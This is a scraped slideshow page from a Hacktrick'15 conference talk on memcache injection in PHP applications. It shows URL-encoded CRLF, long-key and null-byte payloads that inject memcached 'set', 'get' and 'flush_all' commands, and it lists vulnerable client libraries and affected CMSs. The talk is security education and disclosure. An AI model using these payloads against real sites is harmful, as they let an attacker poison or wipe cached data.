Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Memcache Injection (Hacktrick'15)

1,317 views

Published on

Memcache Injection (Hacktrick'15)

Published in: Software
  • Be the first to comment

  • Be the first to like this

Memcache Injection (Hacktrick'15)

  1. 1. Memcache Injection Ömer Çıtak – Hacktrick’15
  2. 2. Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social : @Om3rCitak #! whoami
  3. 3. #! memcached.jpg
  4. 4. #! cat using_memcached
  5. 5. #! phpstorm memcached.php
  6. 6. > set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END #! telnet 127.0.0.1 11211
  7. 7. memcached.php?key= #! phpstorm memcached.php
  8. 8. #! phpstorm memcached.php memcached.php?key=omer
  9. 9. #! phpstorm memcached.php ?key=omer+0+3600+6+rn+hacked+rn
  10. 10. ?key=omer 0 10 6 rn hacked rn urlencode(‘r’) = %0d urlencode(‘n’) = %0a ?key=omer 0 10 6 %0d%0a hacked %0d%0a #! phpstorm memcached.php
  11. 11. #! telnet 127.0.0.1 11211 > set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
  12. 12. ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=aaaaa…(251) flush_all %0d%0a #! phpstorm memcached.php
  13. 13. #! phpstorm memcached.php
  14. 14. ?key=omer #! phpstorm memcached.php
  15. 15. > get key_omer < VALUE key_omer 0 6 < 123456 < END #! phpstorm memcached.php
  16. 16. ?key=aaa (251) %0d%0a get omer 0 6 #! phpstorm memcached.php
  17. 17. > get aaa (251) < ERROR < get omer < VALUE omer 0 6 < 353535 < END #! phpstorm memcached.php
  18. 18. Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached #! cat vulnerable_libraries
  19. 19. Python : python-memcache Php : memcache Java : java.net.spy.memcached #! cat safe_libraries
  20. 20. • Wordpress • Joomla 3.2.2 • Piwik 2.1.0 • MODX Revolution 2.3 #! cat using_memcached
  21. 21. fixed?
  22. 22. fixed?
  23. 23. #! questions?
  24. 24. Thanks <3 www.omercitak.com Social : @Om3rCitak #! exit

×